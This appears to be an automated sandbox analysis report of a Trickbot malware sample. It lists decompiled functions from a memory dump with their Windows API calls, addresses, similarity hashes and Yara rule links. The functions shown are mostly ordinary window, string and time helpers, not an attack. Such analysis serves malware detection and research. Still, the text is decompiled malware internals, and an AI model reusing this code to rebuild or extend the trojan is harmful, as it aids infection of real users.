GetDlgCtrlID.USER32(?), ref: 0042E637
lstrcpynA.KERNEL32(?,?,00000050), ref: 0042E67C
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0042E69D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CtrlH_prologWindowlstrcpyn
String ID:
API String ID: 2888839504-0
Opcode ID: 66a8672dd3d1165a0e2c465d095fbb80352f853bcff6ce8c0a50682a30807e96
Instruction ID: d1a061f2199b96a1a8a7a75e3c56f39abbb0ccb82755a63e69b995dcefd57d30
Opcode Fuzzy Hash: 66a8672dd3d1165a0e2c465d095fbb80352f853bcff6ce8c0a50682a30807e96
Instruction Fuzzy Hash: 9521B372A00215ABDB30DFA6DC85BEEB7E8BF14314F84092EF561922D0D7B49984CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5E8, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040D5E8(void* __ecx) {
				int _t30;
				void* _t40;
				int _t42;
				short* _t44;
				int _t45;
				int _t48;
				void* _t49;
				short* _t51;

				_t40 = __ecx;
				_t51 =  *(_t49 - 0x18);
				 *(_t49 - 0x24) = 0;
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				_t45 =  *(_t49 + 0x14);
				_t42 = 1;
				if( *(_t49 - 0x24) == 0 || MultiByteToWideChar( *(_t49 + 0x20), _t42,  *(_t49 + 0x10), _t45,  *(_t49 - 0x24),  *(_t49 - 0x1c)) == 0) {
					L8:
					_t30 = 0;
				} else {
					_t48 = MultiByteToWideChar( *(_t49 + 0x20), 9,  *(_t49 + 0x18),  *(_t49 + 0x1c), 0, 0);
					 *(_t49 - 0x20) = _t48;
					if(_t48 == 0) {
						goto L8;
					} else {
						 *(_t49 - 4) = _t42;
						E00405B80(_t48 + _t48 + 0x00000003 & 0x000000fc, _t40);
						 *(_t49 - 0x18) = _t51;
						_t44 = _t51;
						 *(_t49 - 0x28) = _t44;
						 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
						if(_t44 == 0 || MultiByteToWideChar( *(_t49 + 0x20), 1,  *(_t49 + 0x18),  *(_t49 + 0x1c), _t44, _t48) == 0) {
							goto L8;
						} else {
							_t30 = CompareStringW( *(_t49 + 8),  *(_t49 + 0xc),  *(_t49 - 0x24),  *(_t49 - 0x1c), _t44, _t48);
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
				return _t30;
			}

0x0040d5e8
0x0040d5e8
0x0040d5ed
0x0040d5f0
0x0040d5f4
0x0040d5f9
0x0040d5fd
0x0040d696
0x0040d696
0x0040d61d
0x0040d62c
0x0040d62e
0x0040d633
0x00000000
0x0040d635
0x0040d635
0x0040d640
0x0040d645
0x0040d648
0x0040d64a
0x0040d64d
0x0040d667
0x00000000
0x0040d680
0x0040d68e
0x0040d68e
0x0040d667
0x0040d633
0x0040d69e
0x0040d6a9

APIs

MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?), ref: 0040D617
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0040D62A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0040D676
CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 0040D68E

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: dc2ad3bfe4d11ef9f3f749a97133c751e206c66b2d961d7dfe717cbb87ae37c0
Instruction ID: 3391dc593a04c76d0e82be29b7ec3818955de7b566751aab4ad8b031ea50d394
Opcode Fuzzy Hash: dc2ad3bfe4d11ef9f3f749a97133c751e206c66b2d961d7dfe717cbb87ae37c0
Instruction Fuzzy Hash: 52210472D00249ABCF218FD4CC459DEBFB5FB48760F14452AFA18722A0C3369966DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E102, Relevance: 6.1, APIs: 4, Instructions: 66
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E102(intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				int _t36;
				void* _t50;

				_t47 = _a4;
				_v28.wYear =  *((intOrPtr*)(E00416052(_a4, 0, 0) + 0x14)) + 0x76c;
				_v28.wMonth =  *((intOrPtr*)(E00416052(_t47, 0, 0) + 0x10)) + 1;
				_v28.wDay =  *((intOrPtr*)(E00416052(_t47, 0, 0) + 0xc));
				_v28.wHour =  *((intOrPtr*)(E00416052(_t47, 0, 0) + 8));
				_v28.wMinute =  *((intOrPtr*)(E00416052(_t47, 0, 0) + 4));
				_t30 = E00416052(_t47, 0, 0);
				_v28.wMilliseconds = 0;
				_v28.wSecond =  *_t30;
				if(SystemTimeToFileTime( &_v28,  &_v12) == 0) {
					E0041DA99(_t50, GetLastError(), 0);
				}
				_t36 = LocalFileTimeToFileTime( &_v12, _a8);
				if(_t36 == 0) {
					return E0041DA99(_t50, GetLastError(), 0);
				}
				return _t36;
			}

0x0041e10a
0x0041e122
0x0041e132
0x0041e142
0x0041e152
0x0041e162
0x0041e166
0x0041e16e
0x0041e172
0x0041e18c
0x0041e192
0x0041e192
0x0041e19e
0x0041e1a6
0x00000000
0x0041e1ac
0x0041e1b4

APIs

SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E17E
GetLastError.KERNEL32(00000000), ref: 0041E18F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041E19E
GetLastError.KERNEL32(00000000), ref: 0041E1A9

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Time$File$ErrorLast$LocalSystem
String ID:
API String ID: 1172841412-0
Opcode ID: f8898b07d4c5cea944e5b4a27e0b7a55bb33f669b060689bb7d031314a57ac4c
Instruction ID: 07be1db4f399fb03fe53eb1ad788810041d99f30eb516af943a54ad3bde5bc43
Opcode Fuzzy Hash: f8898b07d4c5cea944e5b4a27e0b7a55bb33f669b060689bb7d031314a57ac4c
Instruction Fuzzy Hash: 0D116339A10215768F00FBE6C8458EFBBBEAF89304B05505BF91597221E6B4C981C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 004110E0, Relevance: 6.1, APIs: 4, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004110E0(void* __eflags, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				void* _t10;
				long _t13;
				long _t21;
				struct HWND__* _t25;

				_t25 = _a4;
				_t10 = E004105F0(_t25);
				_t31 = _t10;
				if(_t10 != 0) {
					_t13 = GetPropA(_t25, 0);
					__eflags = _t13;
					if(_t13 == 0) {
						_t21 =  &_v4;
						_v4 = 0x29a;
						_t13 = SendMessageA(_t25, 0x1944, 0, _t21);
						__eflags = _v4 - 0x29a;
						if(_v4 == 0x29a) {
							_t13 = SendMessageA(_t25, 0x1943, 0, _t21);
							__eflags = _v4 - 0x29a;
							if(_v4 == 0x29a) {
								__eflags = 0;
								RemovePropA(_t25, 0);
								_push(_a12);
								_push(0);
								_push(_a8);
								_push(_t25);
								return E004121F0(__eflags);
							}
						}
					}
					return _t13;
				} else {
					_push(_a12);
					_push(0);
					_push(_a8);
					_push(_t25);
					return E004121F0(_t31);
				}
			}

0x004110e5
0x004110eb
0x004110f3
0x004110f5
0x0041111d
0x00411123
0x00411125
0x00411127
0x00411131
0x00411142
0x00411144
0x0041114c
0x00411157
0x00411159
0x00411161
0x00411163
0x0041116d
0x0041117c
0x0041117d
0x0041117f
0x00411180
0x00000000
0x00411186
0x00411161
0x0041114c
0x0041118f
0x004110f7
0x004110ff
0x00411100
0x00411102
0x00411103
0x00411112
0x00411112

APIs

GetPropA.USER32(?,00000000), ref: 0041111D
SendMessageA.USER32(?,00001944,00000000,?), ref: 00411142
SendMessageA.USER32(?,00001943,00000000,?), ref: 00411157
RemovePropA.USER32(?,00000000), ref: 0041116D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessagePropSend$Remove
String ID:
API String ID: 2793251306-0
Opcode ID: 9d783b7f87efe0456fc6f475102cabf6c5e08732b00771f79e8cee98ac825063
Instruction ID: e6d172cf423bcb528c6391416559a19d0f1cacbd843c27cbae755e5c50842972
Opcode Fuzzy Hash: 9d783b7f87efe0456fc6f475102cabf6c5e08732b00771f79e8cee98ac825063
Instruction Fuzzy Hash: A51177795402107EE201AB10AC45FFB739CEB89765F044429FE1492251E37C9D8A8BAF

Uniqueness

Uniqueness Score: -1.00%

Function 0043507D, Relevance: 6.1, APIs: 4, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043507D(void* __ecx) {
				CHAR* _t35;
				void* _t40;
				CHAR* _t49;
				CHAR* _t55;
				signed int _t56;
				void* _t61;

				E00405340(E00437C14, _t61);
				_t49 =  *(_t61 + 8);
				_t55 =  *(_t61 + 0xc);
				 *(_t61 + 0xc) =  &(_t49[_t55 - 1]);
				 *((intOrPtr*)(_t61 - 0x10)) =  *((intOrPtr*)(E0041C00C() + 0x1c));
				_t56 = 0 | _t55 != 0x00000001;
				_t35 =  *0x447478; // 0x44748c
				 *(_t61 + 8) = _t35;
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				if(E0041C729(_t61 + 8,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x114)) + 0x1c)), _t56, 0xa) != 0) {
					if(_t56 != 0) {
						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49,  *(_t61 + 0xc));
					} else {
						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49);
					}
					SendMessageA( *( *((intOrPtr*)(_t61 - 0x10)) + 0x1c), 0x362, 0, _t61 - 0x60);
				}
				 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
				_t40 = E00417EC8(_t61 + 8);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t40;
			}

0x00435082
0x0043508b
0x00435090
0x00435099
0x004350a4
0x004350af
0x004350b1
0x004350b6
0x004350bf
0x004350d5
0x004350d9
0x004350f9
0x004350db
0x004350e3
0x004350e9
0x00435113
0x00435113
0x00435119
0x00435120
0x0043512b
0x00435133

APIs

__EH_prolog.LIBCMT ref: 00435082

Part of subcall function 0041C729: lstrlenA.KERNEL32(?), ref: 0041C76D

wsprintfA.USER32 ref: 004350E3
wsprintfA.USER32 ref: 004350F9
SendMessageA.USER32(?,00000362,00000000,?), ref: 00435113

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: wsprintf$H_prologMessageSendlstrlen
String ID:
API String ID: 443212507-0
Opcode ID: 7568dc1891dc1f9f5f28723849bcb0ad32ad2c1ea288e8933e7830568249f652
Instruction ID: 3896952cd2ac3589815e7203ab989da825ee935fbd18f32ef7b3df015077bb18
Opcode Fuzzy Hash: 7568dc1891dc1f9f5f28723849bcb0ad32ad2c1ea288e8933e7830568249f652
Instruction Fuzzy Hash: 5A214D76900209AFCB01DFA4CC85ADEBBB9FB48364F008526F919DB251D774EA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0042A062, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0042A062(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t32;
				int _t36;
				void* _t46;

				_push(__ecx);
				_push(__ecx);
				_t46 = __ecx;
				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t36, _t21);
				OffsetRect(_t46 + 0x48, _t36, _v8);
				OffsetRect(_t46 + 0x38, _t36, _v8);
				OffsetRect(_t46 + 0x58, _t36, _v8);
				_t48 =  *((intOrPtr*)(_t46 + 0x80));
				 *((intOrPtr*)(_t46 + 4)) = _a4;
				 *((intOrPtr*)(_t46 + 8)) = _a8;
				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
					_t32 = E0042A860();
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
				return E0042A6F8(_t46, _t48, 0);
			}

0x0042a065
0x0042a066
0x0042a06c
0x0042a07b
0x0042a080
0x0042a082
0x0042a08b
0x0042a095
0x0042a09f
0x0042a0a9
0x0042a0ae
0x0042a0b5
0x0042a0bb
0x0042a0be
0x0042a0c6
0x0042a0c0
0x0042a0c0
0x0042a0c0
0x0042a0cf
0x0042a0db

APIs

OffsetRect.USER32(?,?,?), ref: 0042A08B
OffsetRect.USER32(?,?,?), ref: 0042A095
OffsetRect.USER32(?,?,?), ref: 0042A09F
OffsetRect.USER32(?,?,?), ref: 0042A0A9

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: e3ae6aedc4fbeb52492e3ab1b6ffacc3472f3efdf2bf331ad067950e5a5bf1c0
Instruction ID: d1daf5c72706f8fcfc3b771992623bfbebea344b7a9b586fa9b4d752f20692b1
Opcode Fuzzy Hash: e3ae6aedc4fbeb52492e3ab1b6ffacc3472f3efdf2bf331ad067950e5a5bf1c0
Instruction Fuzzy Hash: 9A113C71600609AFDB10EFAAC884D9BB7ECEF44344B00482EF54AC3610DA74FD408B64

Uniqueness

Uniqueness Score: -1.00%

Function 0042F48D, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0042F48D(void* __ecx) {
				void* __ebp;
				void* _t6;
				void* _t8;
				void* _t27;
				void* _t30;
				void* _t32;

				_t32 = __ecx;
				_t6 = E004187B4(__ecx);
				if(_t6 != 0) {
					if((E0041B66F(_t32) & 0x00000001) != 0) {
						_t27 = E00419DFD(_t32);
						_t30 = E0041884D(_t32, GetForegroundWindow());
						if(_t27 == _t30 || E0041884D(_t32, GetLastActivePopup( *(_t27 + 0x1c))) == _t30 && SendMessageA( *(_t30 + 0x1c), 0x36d, 0x40, 0) != 0) {
							_push(1);
							_pop(0);
						}
						asm("sbb eax, eax");
						SendMessageA( *(_t32 + 0x1c), 0x36d, 0xb4, 0);
					}
					_t8 = 1;
					return _t8;
				}
				return _t6;
			}

0x0042f48e
0x0042f490
0x0042f497
0x0042f4a3
0x0042f4af
0x0042f4c3
0x0042f4c7
0x0042f4f2
0x0042f4f4
0x0042f4f4
0x0042f4f7
0x0042f509
0x0042f50d
0x0042f510
0x00000000
0x0042f510
0x0042f512

APIs

Part of subcall function 0041B66F: GetWindowLongA.USER32(?,000000F0), ref: 0041B67B

GetForegroundWindow.USER32 ref: 0042F4B1
GetLastActivePopup.USER32(?), ref: 0042F4CC
SendMessageA.USER32(?,0000036D,00000040,00000000), ref: 0042F4E8
SendMessageA.USER32(?,0000036D,-00000007,00000000), ref: 0042F509

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageSendWindow$ActiveForegroundLastLongPopup
String ID:
API String ID: 2039223353-0
Opcode ID: 91869999d8780f430f8a3ccff6f9b1c8eca4c61e26f4fe0d02049a032d7895a2
Instruction ID: fa251ff15269e0c7298ac5f7e8a3aaf9f3b83de26abc48cab7713d1af1bed98b
Opcode Fuzzy Hash: 91869999d8780f430f8a3ccff6f9b1c8eca4c61e26f4fe0d02049a032d7895a2
Instruction Fuzzy Hash: 1501F2327803257BEB213E75AC46FAB22299B60750FA0453ABA01D62D1D9E9DC85415C

Uniqueness

Uniqueness Score: -1.00%

Function 00411191, Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411191(void* __eax, void* __ebx, void* __edx, struct HWND__* _a12, intOrPtr _a16) {
				struct HWND__* _t17;
				struct HWND__* _t21;
				intOrPtr _t25;
				void* _t31;

				_t1 = __ebx + 0x56;
				 *_t1 =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
				if( *_t1 != 0) {
					_t21 = GetWindow(_a12, 5);
					__eflags = _t21;
					if(__eflags != 0) {
						_t25 = _a16;
						do {
							E004110E0(__eflags, _t21, _t25, 0);
							_t31 = _t31 + 0xc;
							_t17 = GetWindow(_t21, 5);
							__eflags = _t17;
							while(__eflags != 0) {
								E004110E0(__eflags, _t17, _t25, _t21);
								_t31 = _t31 + 0xc;
								_t17 = GetWindow(_t17, 2);
								__eflags = _t17;
							}
							_t21 = GetWindow(_t21, 2);
							__eflags = _t21;
						} while (__eflags != 0);
					}
					return 1;
				} else {
					return 0;
				}
			}

0x00411196
0x00411196
0x0041119b
0x004111b5
0x004111b7
0x004111b9
0x004111bb
0x004111c0
0x004111c4
0x004111c9
0x004111d1
0x004111d3
0x004111d5
0x004111da
0x004111df
0x004111e7
0x004111e9
0x004111e9
0x004111f2
0x004111f4
0x004111f4
0x004111c0
0x00411201
0x0041119d
0x004111a3
0x004111a3

APIs

GetWindow.USER32(?,00000005), ref: 004111B3
GetWindow.USER32(00000000,00000005), ref: 004111CF
GetWindow.USER32(00000000,00000002), ref: 004111E5
GetWindow.USER32(00000000,00000002), ref: 004111F0

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: ba5edc726217d0f55e6b6351d0a90b9943e9f5060299240123e9aa43c5f549d8
Instruction ID: a1ed8345b0a64d0b6a3fba31b0051199d143df140da30347aa5d34f979e11ae7
Opcode Fuzzy Hash: ba5edc726217d0f55e6b6351d0a90b9943e9f5060299240123e9aa43c5f549d8
Instruction Fuzzy Hash: 18F0F93730134132D22163AE2CC6FABBB988BD5B91F00003BF70096252ED59D8454229

Uniqueness

Uniqueness Score: -1.00%

Function 00411281, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411281(void* __eax, void* __edx, void* __esi, signed char _a8, struct HDC__* _a13, struct HWND__* _a17) {
				signed char _t7;
				signed char _t8;
				long _t10;
				intOrPtr _t13;
				long _t18;
				struct HDC__* _t22;
				struct HWND__* _t25;

				_t1 = __esi + 0x74;
				 *_t1 =  *((intOrPtr*)(__esi + 0x74)) + __edx;
				if( *_t1 < 0) {
					L10:
					return 0;
				} else {
					_t7 = _a8;
					_t8 = _t7 & 0x00000008;
					if(_t8 < 0x134 || _t8 == 0x137) {
						goto L10;
					} else {
						if(_t8 != 0x134) {
							L9:
							_t22 = _a13;
							_t10 =  *0x44d370; // 0x0
							SetTextColor(_t22, _t10);
							_t18 =  *0x44d368; // 0x0
							SetBkColor(_t22, _t18);
							_t13 =  *0x44d388; // 0x0
							return _t13;
						} else {
							if( *0x44d360 >= 0x35f) {
								L8:
								return 0;
							} else {
								_t25 = _a17;
								if(GetWindow(_t25, 5) == 0 || (GetWindowLongA(_t25, 0xfffffff0) & 0x00000003) == 3) {
									goto L8;
								} else {
									goto L9;
								}
							}
						}
					}
				}
			}

0x00411286
0x00411286
0x00411289
0x004112fc
0x004112ff
0x0041128a
0x0041128a
0x0041128c
0x00411293
0x00000000
0x0041129c
0x004112a1
0x004112d4
0x004112d4
0x004112d8
0x004112df
0x004112e5
0x004112ed
0x004112f3
0x004112f9
0x004112a3
0x004112ac
0x004112ce
0x004112d1
0x004112ae
0x004112ae
0x004112bd
0x00000000
0x00000000
0x00000000
0x00000000
0x004112bd
0x004112ac
0x004112a1
0x00411293

APIs

GetWindow.USER32(?,00000005), ref: 004112B5
GetWindowLongA.USER32(?,000000F0), ref: 004112C2
SetTextColor.GDI32(?,00000000), ref: 004112DF
SetBkColor.GDI32(?,00000000), ref: 004112ED

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ColorWindow$LongText
String ID:
API String ID: 3945788684-0
Opcode ID: 856346d837d2dd4a79e5d931d0b60ab9acd63712bb04a2470286c14b49f0b745
Instruction ID: c4c87754b4dc18ecada0eef6f772d8b29d996c253931acdfc0ab491aeddbeba9
Opcode Fuzzy Hash: 856346d837d2dd4a79e5d931d0b60ab9acd63712bb04a2470286c14b49f0b745
Instruction Fuzzy Hash: 7401D83A6092505BDF20DB64BC48DDB7754E792321F044867FA41E31A0D2789DC2C76E

Uniqueness

Uniqueness Score: -1.00%

Function 00410750, Relevance: 6.1, APIs: 4, Instructions: 53
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410750(int _a4, int _a8, long _a12) {
				void* _v4;
				struct HHOOK__* _t17;
				long _t22;
				signed char _t25;
				intOrPtr _t27;
				struct HHOOK__* _t30;
				long _t31;
				long _t32;

				_t32 = _a12;
				_t30 =  *0x44bf58; // 0x0
				_t31 = CallNextHookEx(_t30, _a4, _a8, _t32);
				_t27 =  *0x44bf54; // 0x0
				if( *(_t32 + 0xc) == _t27) {
					_t17 =  *0x44bf58; // 0x0
					UnhookWindowsHookEx(_t17);
					if( *0x44d360 < 0x35f) {
						L3:
						_v4 = 1;
					} else {
						_t25 = GetWindowLongA( *(_t32 + 0xc), 0xfffffff0);
						_v4 = 0;
						if((_t25 & 0x00000004) == 0) {
							goto L3;
						}
					}
					SendMessageA( *(_t32 + 0xc), 0x11f0, 0,  &_v4);
					if(_v4 != 0) {
						_t22 =  *0x44bf5c; // 0x0
						E00410660( *(_t32 + 0xc), _t22);
					}
					 *0x44bf58 = 0;
					 *0x44bf5c = 0;
					 *0x44bf54 = 0;
				}
				return _t31;
			}

0x0041075c
0x00410762
0x00410771
0x00410773
0x0041077c
0x0041077e
0x00410784
0x00410793
0x004107ad
0x004107ad
0x00410795
0x0041079b
0x004107a1
0x004107ab
0x00000000
0x00000000
0x004107ab
0x004107c5
0x004107d0
0x004107d2
0x004107dc
0x004107e1
0x004107e6
0x004107eb
0x004107f0
0x004107f0
0x004107fc

APIs

CallNextHookEx.USER32(00000000,?,?,?), ref: 0041076B
UnhookWindowsHookEx.USER32(00000000), ref: 00410784
GetWindowLongA.USER32(?,000000F0), ref: 0041079B
SendMessageA.USER32(00000001,000011F0,00000000,00000001), ref: 004107C5

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
String ID:
API String ID: 4187046592-0
Opcode ID: 5c38c5d8350f127c78e6d3fc206875fa89dc638ff6e3960a1954e697a0466d40
Instruction ID: d95107affab85109cb248e79544b7e60c9bb29929d57d32e8df17cec5c86c39f
Opcode Fuzzy Hash: 5c38c5d8350f127c78e6d3fc206875fa89dc638ff6e3960a1954e697a0466d40
Instruction Fuzzy Hash: C111E979600240AFD714DF58EC48E9777E9EB89315F008929F55AC32A1D774E888CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00426C1E, Relevance: 6.1, APIs: 4, Instructions: 53
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00426C1E(void* __ecx, int _a4, long _a8, signed int _a12) {
				int _v8;
				int _t26;
				void* _t37;
				void* _t44;
				signed int _t47;

				_push(__ecx);
				_t47 = _a12;
				_t37 = __ecx;
				_t44 = (GetDlgCtrlID( *(_t47 + 0x1c)) & 0x0000ffff) - 0xea00;
				_t26 = GetScrollPos( *(_t47 + 0x1c), 2);
				_a12 = _a12 & 0x00000000;
				_v8 = _t26;
				if( *((intOrPtr*)(_t37 + 0x68)) > 0) {
					_a4 = (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff;
					do {
						_a8 =  *(_t47 + 0x1c);
						SendMessageA( *(E00424B00(_t37, _a12, _t44) + 0x1c), 0x114, _a4, _a8);
						if(_a12 <  *((intOrPtr*)(_t37 + 0x68)) - 1) {
							SetScrollPos( *(_t47 + 0x1c), 2, _v8, 0);
						}
						_a12 = _a12 + 1;
						_t26 = _a12;
					} while (_t26 <  *((intOrPtr*)(_t37 + 0x68)));
				}
				return _t26;
			}

0x00426c21
0x00426c24
0x00426c28
0x00426c38
0x00426c41
0x00426c47
0x00426c4f
0x00426c52
0x00426c61
0x00426c64
0x00426c6d
0x00426c83
0x00426c90
0x00426c9c
0x00426c9c
0x00426ca2
0x00426ca5
0x00426ca8
0x00426c64
0x00426cb1

APIs

GetDlgCtrlID.USER32(?), ref: 00426C2D
GetScrollPos.USER32(?,00000002), ref: 00426C41
SendMessageA.USER32(?,00000114,?,?), ref: 00426C83
SetScrollPos.USER32(?,00000002,?,00000000), ref: 00426C9C

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

